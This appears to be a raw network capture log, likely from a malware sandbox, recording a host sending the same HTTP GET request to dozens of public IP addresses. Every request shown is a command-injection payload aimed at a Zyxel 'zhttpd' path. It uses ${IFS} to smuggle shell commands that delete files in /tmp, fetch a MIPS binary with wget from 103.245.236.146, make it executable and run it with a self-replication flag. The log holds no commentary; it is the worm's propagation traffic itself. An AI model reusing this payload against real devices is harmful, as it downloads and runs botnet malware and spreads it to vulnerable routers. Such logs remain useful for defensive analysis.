                                                Jan 28, 2024 10:16:29.879545927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5428192.168.2.236084070.77.86.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879564047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5429192.168.2.2357752142.109.204.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879589081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5430192.168.2.233884823.160.193.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879616976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5431192.168.2.2338414193.222.168.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879643917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5432192.168.2.235006050.14.108.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879677057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5433192.168.2.2354280123.241.109.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879693031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5434192.168.2.2359612121.250.117.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879745007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5435192.168.2.2334278133.147.253.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879750967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5436192.168.2.235433080.194.182.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879797935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5437192.168.2.233530659.116.121.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879820108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5438192.168.2.2334424184.124.31.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879849911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5439192.168.2.234442483.120.212.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879868984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5440192.168.2.2349406101.17.41.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879900932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5441192.168.2.235877236.28.204.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879949093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5442192.168.2.2353264116.210.144.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879949093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5443192.168.2.235574886.64.113.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879997015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5444192.168.2.2356542207.90.252.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880012989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5445192.168.2.2347034131.251.166.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880028009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5446192.168.2.2336252175.109.169.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880081892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5447192.168.2.2350064172.174.188.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880094051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5448192.168.2.2347986124.151.205.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880121946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5449192.168.2.235776893.94.85.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880141020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5450192.168.2.2349170173.176.205.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880162954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5451192.168.2.2357876125.227.90.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880192995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5452192.168.2.23413782.106.128.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880213976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5453192.168.2.23544561.216.213.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880249023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5454192.168.2.234843445.145.156.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880305052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5455192.168.2.2337204198.85.235.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880315065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5456192.168.2.2344184161.190.199.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880341053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5457192.168.2.2358594102.211.102.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880359888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5458192.168.2.2351680147.91.162.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880388021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5459192.168.2.2342074105.223.130.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880417109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5460192.168.2.2347952186.147.135.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880420923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5461192.168.2.234544699.3.84.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880450010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5462192.168.2.2355656159.173.123.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880462885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5463192.168.2.2334210114.141.45.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880511045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5464192.168.2.2356318197.212.154.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880553961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5465192.168.2.234131017.200.85.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880569935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5466192.168.2.2346058130.1.48.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880598068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5467192.168.2.2339350211.17.163.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880609989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5468192.168.2.2338010157.243.39.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880652905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5469192.168.2.2339464107.237.86.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880670071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5470192.168.2.233712237.202.147.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880692005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5471192.168.2.2357398220.9.6.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880726099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5472192.168.2.2359068150.247.15.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880753040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5473192.168.2.2335484112.142.23.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880790949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5474192.168.2.2347560192.66.33.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880800962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5475192.168.2.235696492.179.124.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880844116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5476192.168.2.2335912190.254.20.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880852938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5477192.168.2.234677697.177.211.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880897045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5478192.168.2.234792474.198.87.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880906105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5479192.168.2.23579244.165.2.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880949020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5480192.168.2.233467032.74.45.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880968094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5481192.168.2.233785289.144.56.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880981922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5482192.168.2.234422818.38.145.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.880999088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5483192.168.2.2358024103.143.215.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881011009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5484192.168.2.233654877.250.217.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881031036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5485192.168.2.2354420115.201.111.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881063938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5486192.168.2.2344350201.132.222.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881112099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5487192.168.2.2352942121.203.79.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881139994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5488192.168.2.2346170170.26.76.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.881166935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5489192.168.2.235042414.169.226.100443
                                                TimestampBytes transferredDirectionData
